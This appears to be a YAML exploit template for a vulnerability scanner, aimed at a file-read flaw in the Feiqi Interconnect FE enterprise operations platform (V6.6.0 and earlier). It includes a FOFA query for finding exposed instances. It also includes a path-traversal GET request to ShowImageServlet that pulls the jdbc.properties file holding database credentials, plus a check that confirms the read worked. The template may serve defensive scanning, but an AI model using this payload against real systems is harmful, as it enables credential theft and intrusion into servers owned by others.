product: FE企业运营管理平台
vName: 飞企互联 FE企业运营管理平台 imagePath参数文件读取
type: 文件读取
vID: [ ]
level: 3
vDesc: FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台。飞企互联 FE 业务协作平台存在文件读取漏洞，攻击者可通过该漏洞读取系统重要文件获取大量敏感信息。
version: 版本<= V6.6.0
note: ''
search:
  FOFA: app="飞企互联-FE企业运营管理平台" || app="FE-协作平台"
protocol: http
link: https://blog.csdn.net/weixin_43567873/article/details/136523434
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /servlet/ShowImageServlet?imagePath=../web/fe.war/WEB-INF/classes/jdbc.properties&print
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - .jdbc.driver=
            logic: and